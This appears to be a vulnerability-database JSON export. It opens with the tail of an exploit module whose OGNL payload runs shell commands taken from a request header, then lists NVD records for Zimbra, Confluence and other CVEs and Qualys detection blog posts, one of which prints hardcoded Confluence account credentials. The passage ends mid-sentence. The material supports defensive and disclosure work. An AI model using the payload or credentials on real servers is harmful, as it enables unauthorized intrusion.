Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? 
\"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-03T14:53:53", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T15:15:00", "type": "cve", "title": "CVE-2022-37042", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-10-28T13:38:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-37042", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:02", "description": "Corruption of the system by a remote, unauthenticated user. The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T19:15:00", "type": "cve", "title": "CVE-2022-27511", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T21:57:00", "cpe": [], "id": "CVE-2022-27511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27511", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:54:31", "description": "Zimbra's sudo configuration permits the zimbra user to execute the 
zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T20:15:00", "type": "cve", "title": "CVE-2022-37393", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-18T17:12:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.7", "cpe:/a:zimbra:collaboration:8.7.7", "cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:8.8.11", "cpe:/a:zimbra:collaboration:8.7.11", "cpe:/a:zimbra:collaboration:8.7.10", "cpe:/a:zimbra:collaboration:8.8.4", "cpe:/a:zimbra:collaboration:8.8.3", "cpe:/a:zimbra:collaboration:8.8.8", "cpe:/a:zimbra:collaboration:9.0.0", "cpe:/a:zimbra:collaboration:8.8.9", "cpe:/a:zimbra:collaboration:8.8.2", "cpe:/a:zimbra:collaboration:8.8.12", "cpe:/a:zimbra:collaboration:8.7.9", "cpe:/a:zimbra:collaboration:8.8.0", "cpe:/a:zimbra:collaboration:8.7.6", "cpe:/a:zimbra:collaboration:8.8.6", 
"cpe:/a:zimbra:collaboration:8.8.10"], "id": "CVE-2022-37393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37393", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:8.7.11:p13:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p11:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p12:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p31:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p30:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p19:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p2:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p33:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p14:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.7:*:*:*:*:*:*:*", 
"cpe:2.3:a:zimbra:collaboration:8.8.8:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p27:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p6:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p9:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p25:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p15:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p23:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p34:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p32:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p0:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7.1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p11:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:35:19", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. 
The Service Appliances are SA 100, SA 400, and Virtual SA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T02:15:00", "type": "cve", "title": "CVE-2022-29499", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-05-05T18:25:00", "cpe": ["cpe:/a:mitel:mivoice_connect:22.20.2300.0"], "id": "CVE-2022-29499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mitel:mivoice_connect:22.20.2300.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:52", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. 
This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T18:15:00", "type": "cve", "title": "CVE-2022-26138", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T14:13:00", "cpe": ["cpe:/a:atlassian:questions_for_confluence:2.7.35", "cpe:/a:atlassian:questions_for_confluence:2.7.34", "cpe:/a:atlassian:questions_for_confluence:3.0.2"], "id": "CVE-2022-26138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:2.7.35:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:questions_for_confluence:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. 
These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27924", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-05-03T12:59:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27924", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27924", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:37:15", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. 
NOTE: WinRAR and Android RAR are unaffected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-09T08:15:00", "type": "cve", "title": "CVE-2022-30333", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-10-26T02:35:00", "cpe": [], "id": "CVE-2022-30333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:31:59", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. 
An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:15:00", "type": "cve", "title": "CVE-2022-27925", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-28T19:11:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-27925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27925", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:53", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. 
The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T22:15:00", "type": "cve", "title": "CVE-2022-26134", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T06:15:00", "cpe": ["cpe:/a:atlassian:confluence_data_center:7.18.0", "cpe:/a:atlassian:confluence_server:7.18.0"], "id": "CVE-2022-26134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:confluence_server:7.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:confluence_data_center:7.18.0:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2022-08-19T00:02:03", "description": "Over the last few months, Atlassian Confluence has increasingly become a target for attackers. 
In June 2022, a critical severity OGNL Remote Code Execution vulnerability was disclosed (CVE-2022-26134). More recently, CVE-2022-26138 was disclosed on social media platforms in July 2022.\n\nIn CVE-2022-26138, a Confluence user account is created by the Questions for Confluence app with hardcoded credentials stored inside the plugin jar file available on [Atlassian packages](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>). An attacker with knowledge of these credentials could log into the Confluence application and access all contents within the confluence-users group. [Atlassian](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has rated the vulnerability "critical" and highlighted that the vulnerability is being exploited in the wild.\n\nDue to the nature of this vulnerability, it can only be verified remotely by logging into the Confluence application with the hardcoded credentials. Traditional open source scanners and scripts are checking for the Location HTTP response header and 302 status code to verify the credentials, which could result in false positives. [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released QID 150556 that confirms the vulnerability detection in two steps. The detection takes an additional step to verify the valid credentials by navigating to the user profile page and verifying that the correct page is returned. 
This check is much more efficient in comparison to open source scanners and eliminates any possibility of false positives.\n\n## About CVE-2022-26138\n\nAccording to Confluence's [Questions for Confluence Security Advisory](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), both Confluence Server and Confluence Data Center products using affected versions of the Questions for Confluence app are impacted by CVE-2022-26138.\n\nAffected versions :\n\nQuestions for Confluence 2.7.x| 2.7.34 \n2.7.35 \n---|--- \nQuestions for Confluence 3.0.x| 3.0.2 \n \n## Hardcoded Credentials Vulnerability\n\nAffected versions of the Questions for Confluence app, when installed on a Confluence application, create a user account with username `disabledsystemuser` and password `disabled1system1user6708` and the account is added to confluence-users group, which allows viewing and editing all non-restricted pages within Confluence [by default](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>). A remote attacker can easily leverage these credentials to browse sensitive contents within the Confluence application.\n\nThese hardcoded credentials are stored in `default.properties` file inside a [`confluence-questions-X.X.X.jar` file](<https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/>), as shown below.\n\n\n\n## Detecting the Vulnerability with Qualys Web Application Scanning\n\nExisting Qualys customers can detect CVE-2022-26138 on their target Confluence instance with Qualys Web Application Scanning (WAS) using the following Qualys ID (QID):\n\n * 150556 : Atlassian Confluence Server and Data Center : Questions for Confluence App - Hardcoded Credentials (CVE-2022-26138)\n\nThe QID is part of the core category. 
A vulnerability scan with a core or custom search list including the QID in the options profile will flag all vulnerable applications, as shown below.\n\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, the user will see similar results in the vulnerability scan report, as shown here:\n\n\n\n### Solution & Mitigation\n\nTo remediate this vulnerability, any organization using the Questions for Confluence app is advised to ensure the following:\n\n * Upgrade to Version 2.7.x >= 2.7.38 (compatible with Confluence 6.13.18 through 7.16.2) and Versions >= 3.0.5 (compatible with Confluence 7.16.3 and later)\n * Disable or delete the disabledsystemuser account\n\nPlease note that uninstalling the Questions for Confluence app does not remediate this vulnerability. The disabledsystemuser account does not automatically get removed after the app has been uninstalled. It is possible for this account to be present if the Questions for Confluence app was previously installed. 
It is advised to check the list of active users to ensure the Confluence instance is not affected.\n\n### Credit\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>\n\n### CVE Details:\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26138>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T10:12:53", "type": "qualysblog", "title": "Atlassian Confluence: Questions for Confluence App Hardcoded Credentials Vulnerability (CVE-2022-26138)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138"], "modified": "2022-08-17T10:12:53", "id": "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security 
advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The 